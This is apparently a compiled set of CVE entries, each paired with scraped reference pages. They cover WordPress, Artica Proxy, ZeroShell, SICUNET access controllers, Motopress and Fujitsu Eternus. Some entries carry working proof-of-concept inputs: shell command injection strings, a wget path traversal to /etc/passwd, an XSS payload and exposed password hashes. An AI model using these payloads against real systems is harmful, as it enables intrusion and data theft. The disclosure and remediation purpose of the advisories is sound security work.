Cross-site scripting vulnerability exists in WP Statistics versions prior to 13.2.0 because it improperly processes a platform parameter. By exploiting this vulnerability, an arbitrary script may be executed on the web browser of the user who is logging in to the website using the product.

CVE-2022-27231: WP Statistics

In the SEOmatic plugin up to 3.4.11 for Craft CMS 3, it is possible for unauthenticated attackers to perform a Server-Side Template Injection, allowing for remote code execution.

CVE-2021-41749: craft-seomatic/CHANGELOG.md at develop · nystudio107/craft-seomatic

GUnet Open eClass (aka openeclass) before 3.12.2 allows XSS via the modules/auth/formuser.php auth parameter.

**Υποστήριξη Διαδραστικού Περιεχομένου τύπου H5P**

*   Ενσωμάτωση διαδραστικού περιεχομένου τύπου H5P (https://h5p.org/) στα μαθήματα.
    
*   Υποστήριξη εισαγωγής και δημιουργίας / διόρθωσης.
    

**Πιστοποίηση χρηστών**

*   Διόρθωση και αναβάθμιση του τρόπου πιστοποίησης χρηστών μέσω λογαριασμών κοινωνικών δικτύων (π.χ. Twitter, Facebook, Google, κ.λπ.)
    

**Δικαιώματα χρηστών**

*   Διάφορες διορθώσεις στα δικαιώματα του χρήστη διαχειριστή τμημάτων.
    

**Θεματικές ενότητες**

*   Προσθήκη _Διαδραστικού περιεχομένου H5P_, _Ιστολογίου_ στις ενότητες του μαθήματος.
    

**Ανανέωση μαθήματος**

*   Επιλογής απόκρυψης εργασιών
    

**Ομάδες χρηστών**

*   Διορθώσεις
    

**Γραμμή μάθησης**

*   Διορθώσεις
    

**Γενικά**

*   Υποστήριξη της έκδοσης PHP 8.0

CVE-2021-44266: Open eClass Documentation

ZeroShell 3.9.5 has a command injection vulnerability in /cgi-bin/kerbynet IP parameter, which may allow an authenticated attacker to execute system commands.

Sep 26, 2021

**Artica Proxy 4.30 cyrus.events.php RCE**

Vendor && Product www.articatech.com Artica Web Proxy v4.30.000000 Download: http://www.articatech.com/download.php Reproduction Login the web account, use this poc Because the execution result is not echoed, we view the result by writing a file https://192.168.108.14:9000/cyrus.events.php?logs= ​ POST: rp=;id>../1.txt; access https://192.168.108.14:9000/1.txt, we can see the execution result.

Vulnerability

2 min read

**Artica Proxy 4.30 cyrus.events.php RCE**

**Vendor && Product**

www.articatech.com

Artica Web Proxy v4.30.000000

Download: http://www.articatech.com/download.php

**Reproduction**

Login the web account, use this poc

> _Because the execution result is not echoed, we view the result by writing a file_

https://192.168.108.14:9000/cyrus.events.php?logs=  
 ​  
 POST:  
 rp=;id>../1.txt;

access https://192.168.108.14:9000/1.txt, we can see the execution result.

\--

\--

Sep 24, 2021

**Zeroshell 3.9.5 Authenticated RCE**

The latest version of ZeroShell (3.9.5) has a command injection vulnerability in /cgi-bin/kerbynet, attackers can execute os command through IP parameter. IP parameters are used in two places: POC: /cgi-bin/kerbynet?Section=Router&STk=<your STk>&Action=CheckIPARP&IP=;id /cgi-bin/kerbynet?Section=Router&STk=<your STk>&Action=CheckIPPING&IP=;id&PacketSize=

Vulnerability

1 min read

**Zeroshell 3.9.5 Authenticated RCE**

The latest version of ZeroShell (3.9.5) has a command injection vulnerability in /cgi-bin/kerbynet, attackers can execute os command through IP parameter.

IP parameters are used in two places:

POC:

/cgi-bin/kerbynet?Section=Router&STk=<your STk>&Action=CheckIPARP&IP=;id/cgi-bin/kerbynet?Section=Router&STk=<your STk>&Action=CheckIPPING&IP=;id&PacketSize=

\--

\--

CVE-2021-41738: rootless – Medium

A vulnerability was found in SICUNET Access Controller 0.32-05z. It has been declared as problematic. This vulnerability affects unknown code of the component Password Storage. The manipulation leads to weak encryption. Attacking locally is a requirement.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives****SICUNET Physical Access Controller - Multiple Vulnerabilities**

_From_: Andrew Griffiths <agriffiths+fd () google com>  
_Date_: Wed, 8 Mar 2017 11:17:13 -0800  

SICUNET Physical Access Controller - Multiple Vulnerabilities

-------------------------------------------------------------

Introduction

============

Multiple vulnerabilities were identified in the SICUNET Access Controller
Products. The vulnerabilities were discovered during a black box security
assessment and therefore the vulnerability list should not be considered
exhaustive.

Affected Software and Versions

==============================

Known vulnerable version is 0.32-05z. This version string was taken from
Spider.db.

CVE

===

No CVEs have been assigned.

Vulnerability Overview

======================

0. SN-01: HIGH: Outdated software

1. SN-02: HIGH: PHP include()

2. SN-03: CRITICAL: Unauthenticated remote code execution

3. SN-04: CRITICAL: Hardcoded root credentials

4. SN-05: High: Passwords stored in plaintext

Vulnerability Details

=====================

------------------------

SN-01: Outdated software

------------------------

Severity: High

A variety of software running on the device is outdated, making
exploitation of certain bugs far easier than it would be had they been
patched, or running up to date software.

 /usr/local/php\_b2/bin # ./php -v

 PHP 5.2.14 (cli) (built: Jul  8 2012 22:45:11)

 Copyright (c) 1997-2010 The PHP Group

 Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies

http://php.net/eol.php has more information about PHP 5.2 being End Of
Life, and associated security issues.

 /usr/local/lighttpd/sbin # ./arm-linux-lighttpd -v

 lighttpd/1.4.30 (ssl) - a light and fast webserver

 Build-Date: Dec 26 2013 15:13:53

https://www.lighttpd.net/download/ has more information about security
changes in lighttpd.

 # uname -a
 Linux SICUNET 2.6.32.9 #72 PREEMPT Tue Feb 28 15:25:12 KST 2012 armv7l
 GNU/Linux


It is recommended that software is kept up to date, and that configurations
are reviewed to ensure that they’re secure. For example, there may have
been configuration options for PHP which may have made exploitation harder.

--------------------

SN-02: PHP include()

--------------------

Severity: High

When sending a request to /, the 'c' parameter is used as part of an
include() statement.

Excerpt from /spider/web/webroot/index.php:

 $class  = Input::get('c', 'layout');
 $method = Input::get('m', 'index');

 include APP\_DIR.'/controllers/'.$class.EXT;

(where EXT is defined as '.php’).

By crafting the c parameter, it’s possible to access arbitrary files on the
device:

 wget 'http://victim.ip.address/?c=../../../../../etc/passwd%00&apos;

The %00 trick is a known issue, and is addressed in a later PHP update. For
more information, please see SN-01.

It is recommended that the code be refactored to not require passing user
supplied input to the include() function. Alternatively, a strict whitelist
approach of known modules may be used instead.

--------------------------------------------

SN-03: Unauthenticated remote code execution

--------------------------------------------

Severity: Critical

A variety of functionality is implemented via insecure string concatenation
then passed to underlying exec() functions:

For example, in card\_scan\_decoder.php

16     $No = $\_GET\['No'\];
17     $door = $\_GET\['door'\];
18
19     $result = array();
20
21     $db   = new PDO('sqlite:/tmp/SpiderDB/Spider.db');
<snip>

27
28     if ($No < 1)
29     {
30         $DelTemp = $db->prepare("DELETE FROM CardRawData");
31         $DelTemp->execute();
32
33         exec("/spider/sicu/spider-cgi getrawdata ".$door." on");
34     }

This vulnerability can be exploited by:

 wget 'http://victim.ip.address/card\_scan\_decoder.php?No=0&door=$(sleep 3)’

This is just an example of the pattern of insecurely creating strings to be
executed, and not an exhaustive listing.

It is recommended that injection-proof API's are used instead of
error-prone string concatenation, or whitelist / blacklist being used (for
example, escapeshellcmd). However, it appears as if the closest option in
PHP is http://php.net/manual/en/function.pcntl-exec.php which requires the
user to perform a lot more work to avoid shooting themselves in the foot
(such as forking the process first).

---------------------------------

SN-04: Hardcoded root credentials

---------------------------------

Severity: Critical

There are 3 password fingerprints in /etc/passwd

 root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh
 e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux
User,,,:/home/e3user:/bin/sh
 lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux
User,,,:/home/lighttpd:/bin/sh

The plaintext root password can be found in /spider/sicu binaries. The root
password may be used for the ftp or telnet service on the device. From our
observation, it appears as if FTP is running by default, along with the
ability to login as root via FTP.

The hardcoded root credentials are used by binaries on the system to run
commands as root. It is currently unknown what the purpose of the e3user
and lighttpd hardcoded passwords are.

For example, the root password is used in a variety of ways in the
following format:

 echo %s | su -c 'mkdir -p %s >& /tmp/message'
 echo %s | su -c 'chown %s %s >& /tmp/message'

Where %s is replaced at run time with the cleartext root password before
being passed to the system() function.

It is recommended that hardcoded credentials be removed, and instead
replaced with a more suitable mechanism. For example; sudo may be suitable,
combined with the NOPASSWD directive.

FTP access should be replaced with a more secure transfer mechanism (such
as SSH FTP, or SCP), and authentication should be managed by a user
(preferably via SSH public keys).

------------------------------------------

SN-05: Passwords stored in plaintext

------------------------------------------

Severity: High

A variety of credentials (for example, used for accessing the web front
end, or other devices part of the installation) are stored unencrypted on
the device in /tmp/SpiderDB/Spider.db:

sqlite> SELECT Name,Password FROM WebUser;
admin|ExamplePlaintextPassword
sqlite> SELECT Name,ID,Password FROM Controller;
Server|username|AnotherPlaintextPassword

It is recommended that where passwords must be stored, that they are
suitably cryptographically hashed using an appropriate standard (for more
information, please see https://password-hashing.net).

Author

======

The vulnerabilities were discovered by Andrew Griffiths from Google
Security Team.

Timeline

========

2016/12/06 - Contacted sicunet.com domain registrar, and sales () sicunet com
            for a point of contact to report security issues.

2016/12/08 - Pinged earlier email for a point of contact, additionally
            included tech () sicunet com on an email.

2016/12/08 - Report sent to Ike Huh, CEO.

2016/12/12 - Mentioned that reviewing spider-api would be worthwhile as it
            listens on port 7000, and strings suggests that there may be
            command injection / other vulnerabilities. No reply.

2017/01/17 - Asked point of contact if they had any questions about the
            advisory sent earlier. No reply.

2017/01/24 - Pinged vendor again, asked about resellers who may be able to
            make recommendations about restricting network access to the
            devices from the internet.

2017/01/30 - No contact from vendor.

2017/02/24 - Asked vendor if the affected users can expect patches. No
            reply.

2017/03/01 - Sent an email to the vendor, reminding them disclosure is
coming
            up soon.

2017/03/08 - 90 day disclosure deadline.

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **SICUNET Physical Access Controller - Multiple Vulnerabilities** _Andrew Griffiths (Mar 10)_

CVE-2017-20040: Full Disclosure: SICUNET Physical Access Controller

dynamicMarkt <= 3.10 is affected by SQL injection in the parent parameter of index.php.

**Bastian Groth Internet Service**

{{commentsTotalLength}} KommentarKommentare

Hersteller:

Zur Website

Preis:

349 EUR

Lizenz:

Kostenpflichtig

Betriebssystem:

Linux

Download-Größe:

5120 KByte

Downloadrang:

27274

Datensatz zuletzt aktualisiert:

07.06.2018

_Alle Angaben ohne Gewähr_

  

Shop-Software für Festpreis-, Auktions- und Kleinanzeigen-Markt; der Online-Marktplatz unterstützt Deutsch und Englisch, bietet individuelle Kategorien sowie Layouts und erlaubt Nutzern, sich alle Angebote eines Verkäufers anzusehen

**dynamicMarkt 3.10 - Marktplatz Software**

()

**Das könnte dich auch interessieren**

CVE-2021-41754: dynamicMarkt 3.10 - Marktplatz Software

ITOP v3.0.1 was discovered to contain a cross-site scripting (XSS) vulnerability via /itop/webservices/export-v2.php.

iTop Store  
Find Extensions

iTop University  
Read Documentation

iTop Community  
Browse Forums & Downloads

*   

**What is iTop Hub ?**

iTop Hub is a platform providing you with all the required resources to optimize your iTop.

By joining us, you will be able to learn how to use iTop, to customize your instances to better fit your processes and to contribute to a growing and active community of users !

More

**What is iTop ?**

iTop is an open source ITSM solution allowing you to manage your configuration items and their relationships in a flexible CMDB.

ITIL oriented, iTop enables you to manage your user requests, incidents, problems, changes and service catalog in a single platform.

More

Configure user actions to simplify and automate processes (e.g. create an incident from a CI).

Send an email to pre-configured contacts when a ticket log is updated

Automatically create and update Tickets from incoming emails

Define personalized request forms based on the service catalog. Add extra fields for a given type of request

Guide to all our extensions

Join & contribute to our forums !

**Learn how to use iTop on your own !**

Find all the documentation you need & learn faster by joining our boot camp training or watching our video tutorials. 

**Customize your instances quickly & easily**

Downloads extensions & discover all of the Hub's personalized functionalities to help your better use iTop wide range of possibilities !

CVE-2022-31402: iTop Hub is the ITSM & CMDB open source community toolset.

WordPress Motopress Hotel Booking Lite plugin version 4.2.4 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)# Date: 2022-06-05# Exploit Author: Sanjay Singh# Vendor Homepage: https://motopress.com/# Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip# Version: 4.2.4# Tested on: Windows/XAMPP###########################################################################PoC:1. http://localhost/wp-admin/edit.php?post_type=mphb_room_type2. Click on "Add Accommodation Type".3. Add title payload= "><script>alert("XSS")</script>4. Excerpt input payload "><script>alert("XSS")</script>5. Click publish.6. Visit http://localhost/accommodations/7. XSS payload execute.

WordPress Motopress Hotel Booking Lite 4.2.4 Cross Site Scripting

A Privilege Escalation vulnerability exists in Sourcecodester Money Transfer Management System 1.0, which allows a remote malicious user to gain elevated privileges to the Admin role via any URL.

\# Exploit Title: Privilege Escalation via Forced Browsing

\# Google Dork: NA

\# Date: 11/03/2022

\# Exploit Author: Ali J.

\# Vendor Homepage: https://www.sourcecodester.com/

\# Software Link: https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html

\# Version: 1.0

\# Tested on: Windows 10

\# CVE : CVE-2021-44582

Steps to Reproduce:

1\. Login to the Money Transfer Management System with admin credentials and copy the URL.

2\. Logout from the admin role and login with the normal user credentials, observe the available modules on the left side.

3\. Paste the admin URL and observe that the application is vulnerable to Privilege Escalation via Forced Browsing.

CVE-2021-44582: CVE-2021-44582/Privilege Escalation via Forced Browsing in Sourcecodester Money Transfer Management System at main · warmachine-57/CVE-2021-44582

Sysadmins should update their installations immediately

Jessica Haworth 10 June 2022 at 12:34 UTC

Sysadmins should update their installations immediately

Two flaws in the web interface of a Fujitsu cloud storage system could allow an unauthenticated attacker to read, write, and destroy backed up files.

The security vulnerabilities were present in the enterprise-grade Fujitsu Eternus CS8000 (Control Center) V8.1.

Researchers from NCC Group found two separate issues due to a lack of user input validation in two PHP scripts, which are normally included post-authentication.

Both flaws, a command injection in and a command injection in , could allow an attacker to gain remote code execution on the appliance without prior authentication or authorization.

Read more of the latest web security research here

As no include-guards are in-place, the attacker is able to trigger the script without prior authentication by calling it directly.

This would enable them to take control over the appliance as if they were logged in directly via a secure shell.

“If exploited, the attacker obtains limited user privileges on the machine as the ‘www-data’ user; however, it should be noted that the Kernel on the system which NCC Group’s Fox-IT encountered is severely outdated, allowing an attacker to easily escalate their privileges to the administrative ‘root’ user of the system,” a blog post from NCC Group reads.

“Due to the sensitive nature of the system, any attacker with full control over the system is potentially able to read, modify and potentially destroy the entire virtual backup tapes, which could be used as an initial stage of a ransomware attack to ensure the victim is not able to recover and is forced to pay the ransom.”

**Patch now**

The issues were discovered during a penetration test conducted by NCC Group on behalf of a client. They were then reported to Fujitsu, which has since patched the bugs (PDF).

Fujitsu said it has “no knowledge” of any working exploit code, and has seen no successful attempts to exploit the vulnerabilities in the wild.

NCC Group advised users to upgrade to the latest version of the software immediately. It has also listed other recommendations to mitigate the bugs in the blog post.

The Daily Swig has reached out to both NCC Group and Fujitsu for comment and will update this article accordingly.

DON’T MISS Chinese cyber threat actors are widely abusing well-known attacks to infiltrate networks, CISA warns

Tag

#php